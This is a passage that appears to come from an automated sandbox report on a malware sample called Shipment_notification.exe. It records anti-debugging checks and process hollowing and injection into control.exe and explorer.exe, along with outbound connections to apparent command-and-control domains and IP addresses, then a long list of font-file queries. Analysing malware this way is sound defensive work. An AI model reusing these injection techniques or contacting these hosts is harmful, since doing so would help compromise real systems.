          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]2_2_01B66C0A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0746D mov eax, dword ptr fs:[00000030h]2_2_01B0746D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h]2_2_01B7C450
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h]2_2_01B7C450
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A44B mov eax, dword ptr fs:[00000030h]2_2_01B1A44B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]2_2_01B67794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]2_2_01B67794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]2_2_01B67794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF8794 mov eax, dword ptr fs:[00000030h]2_2_01AF8794
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B237F5 mov eax, dword ptr fs:[00000030h]2_2_01B237F5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h]2_2_01AE4F2E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h]2_2_01AE4F2E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1E730 mov eax, dword ptr fs:[00000030h]2_2_01B1E730
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0F716 mov eax, dword ptr fs:[00000030h]2_2_01B0F716
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h]2_2_01B7FF10
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h]2_2_01B7FF10
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h]2_2_01BB070D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h]2_2_01BB070D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h]2_2_01B1A70E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h]2_2_01B1A70E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFFF60 mov eax, dword ptr fs:[00000030h]2_2_01AFFF60
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8F6A mov eax, dword ptr fs:[00000030h]2_2_01BB8F6A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFEF40 mov eax, dword ptr fs:[00000030h]2_2_01AFEF40
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B646A7 mov eax, dword ptr fs:[00000030h]2_2_01B646A7
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]2_2_01BB0EA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]2_2_01BB0EA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]2_2_01BB0EA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FE87 mov eax, dword ptr fs:[00000030h]2_2_01B7FE87
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF76E2 mov eax, dword ptr fs:[00000030h]2_2_01AF76E2
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B116E0 mov ecx, dword ptr fs:[00000030h]2_2_01B116E0
          Source: C:\Users\user\Desktop\Shipment_notification.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040CEE3 LdrLoadDll
          Source: C:\Users\user\Desktop\Shipment_notification.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 206.54.190.30 80
          Source: C:\Windows\explorer.exe Network Connect: 154.218.155.8 80
          Source: C:\Windows\explorer.exe Domain query: www.tcatelier.com
          Source: C:\Windows\explorer.exe Network Connect: 199.59.243.223 80
          Source: C:\Windows\explorer.exe Network Connect: 45.114.105.2 80
          Source: C:\Windows\explorer.exe Domain query: www.carcosainvest.com
          Source: C:\Windows\explorer.exe Domain query: www.locationsbormes.com
          Source: C:\Windows\explorer.exe Domain query: www.peramid.xyz
          Source: C:\Windows\explorer.exe Network Connect: 198.177.124.57 80
          Source: C:\Windows\explorer.exe Domain query: www.piergitarshoes.com
          Source: C:\Windows\explorer.exe Domain query: www.emagrecarapido.store
          Source: C:\Windows\explorer.exe Domain query: www.isabellagambitta.com
          Source: C:\Windows\explorer.exe Network Connect: 185.27.134.217 80
          Source: C:\Windows\explorer.exe Network Connect: 66.96.161.158 80
          Source: C:\Windows\explorer.exe Domain query: www.ywtxsm.com
          Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
          Source: C:\Windows\explorer.exe Domain query: www.drkathleensanders.com
          Source: C:\Users\user\Desktop\Shipment_notification.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 880000
          Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipment_notification.exe Memory written: C:\Users\user\Desktop\Shipment_notification.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Shipment_notification.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exe Thread register set: target process: 3324
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3324
          Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: explorer.exe, 00000003.00000000.353184774.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536066000.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.562430568.00000000086B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.577680371.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.339413260.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Users\user\Desktop\Shipment_notification.exe VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
